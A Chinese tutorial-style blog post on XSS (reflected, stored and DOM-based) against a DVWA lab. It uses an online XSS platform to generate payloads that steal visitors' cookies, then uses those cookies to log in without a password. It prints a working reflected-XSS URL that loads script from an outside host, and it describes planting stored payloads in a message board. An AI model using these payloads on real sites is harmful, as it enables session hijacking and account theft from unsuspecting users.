Spring aware接口的作用是什么
201
2022-10-23
HW常见攻击方式 --XSS跨站脚本攻击
后来,一杯酒能解决的事,也就不想再浪费眼泪了。。。
---- 网易云热评
一、XSS介绍
跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
二、XSS平台
1、注册登陆账号,没有百分之百的安全,仅供测试交流
https://xssaq.com/xss.php
2、新建项目
3、自动生成要插入的xss代码
三、反射性xss
2、刷新xss平台,会发现有一条数据
3、知道了网址,也知道cookie,下面利用工具登录,不用输入账号密码,直接登录了dvwa平台
http://192.168.1.14/dvwa/vulnerabilities/xss_r/?name=%3CsCRiPt%2FSrC%3Dhttps%3A%2F%2Fxssaq.com%2FdGLM%3E#
四、存储型xss
1、在留言板输入上面生成xss代码
2、只要刷新一下该页面,xss平台就出现一条记录,也就是说只要有人看到该留言板,我们就能获取其cookie
3、利用工具登录
4、存储型xss漏洞,理论是永久的,只要有人浏览到你插入的代码,他的cookie信息就会被拿到。
五、DOM型XSS
2、修改url中english为aaa,发现插入了代码中,所以存在dom型xss注入
3、插入生成的xss代码,即可获取对方的cookie
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~